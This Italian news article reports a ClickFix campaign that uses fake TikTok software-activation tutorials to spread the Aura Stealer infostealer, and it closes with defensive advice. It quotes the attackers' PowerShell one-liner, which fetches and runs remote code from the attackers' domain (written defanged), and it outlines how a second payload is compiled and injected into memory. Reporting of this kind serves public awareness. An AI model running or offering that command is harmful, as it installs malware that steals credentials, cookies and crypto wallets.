Attacchi ClickFix su TikTok: falsi tutorial attivano malware

Una nuova campagna di attacchi ClickFix sta sfruttando video pubblicati su TikTok per distribuire malware in grado di rubare informazioni sensibili dagli account degli utenti. I video si presentano come guide gratuite per attivare software popolari come Windows, Microsoft 365, Adobe Premiere, Photoshop e CapCut Pro. Si tratta quindi di una vera e propria campagna di phishing.

Come funziona l’attacco su TikTok

Le clip condivise nascondono un attacco di social engineering mirato a spingere le vittime ad eseguire comandi PowerShell malevoli. L’istruzione tipica mostrata nei video รจ:

Pubblicitร 
iex (irm slmgr[.]win/photoshop

A seconda del software imitato, il nome all’interno dellโ€™URL varia (ad esempio windows o spotify). L’esecuzione del comando collega il sistema ad un dominio controllato dagli attaccanti (slmgr[.]win) che scarica script PowerShell aggiuntivi e due eseguibili dannosi.

Il primo file, updater.exe, รจ una variante del malware Aura Stealer, specializzato nel furto di credenziali salvate nei browser, cookie di autenticazione, chiavi di wallet di criptovalute e dati di accesso ad applicazioni desktop. Una volta eseguito, il malware invia queste informazioni ai server dei cybercriminali e permette l’accesso remoto agli account compromessi.

Un secondo componente, source.exe, viene poi scaricato e compilato localmente tramite il compilatore .NET (csc.exe) per l’iniezione e l’esecuzione di codice malevolo direttamente in memoria. La funzione esatta di questo payload non รจ stata perรฒ ancora chiarita.

Come difendersi dagli attacchi ClickFix

Gli esperti raccomandano a chiunque abbia assistito all’esecuzione di istruzioni simili di cambiare immediatamente tutte le password. Gli attacchi ClickFix sono sempre piรน diffusi e utilizzati per distribuire ransomware e malware mirati al furto di criptovalute.

Come regola generale, gli utenti dovrebbero evitare di copiare comandi da fonti non verificate ed eseguirli su PowerShell, Terminale o Prompt dei comandi, anche quando provengono da piattaforme apparentemente affidabili come TikTok.

Iscriviti a Google News Per restare sempre aggiornato seguici su Google News! Seguici
Pubblicitร 
Claudio Garau
Claudio Garau
Web developer, programmatore, Database Administrator, Linux Admin, docente e copywriter specializzato in contenuti sulle tecnologie orientate a Web, mobile, Cybersecurity e Digital Marketing per sviluppatori, PA e imprese.

Leggi anche...

Avviso di consegna pacco: il pericolo del malware nascosto negli allegati

Recentemente, gli esperti di cybersecurity hanno messo in guardia...

Ivory: il nuovo social network italiano per contenuti di qualitร 

Nasce in Italia un nuovo social network, Ivory, concepito...

Hacker attaccano il sistema anti-inondazione di Piazza San Marco a Venezia

Negli ultimi giorni, la cittร  di Venezia ha visto...

Hacker filorussi prendono di mira router TP-Link: attacchi e misure di protezione

Un nuovo allerta nel campo della cybersecurity ha messo...

Hacker attaccano Booking: fuga di dati e sicurezza dei clienti a rischio

Negli ultimi giorni, Booking, una delle piattaforme di prenotazione...

Elon Musk su TikTok: una svolta nei social media e nei suoi piani aziendali

Elon Musk ha recentemente inaugurato un nuovo capitolo nella...
Pubblicitร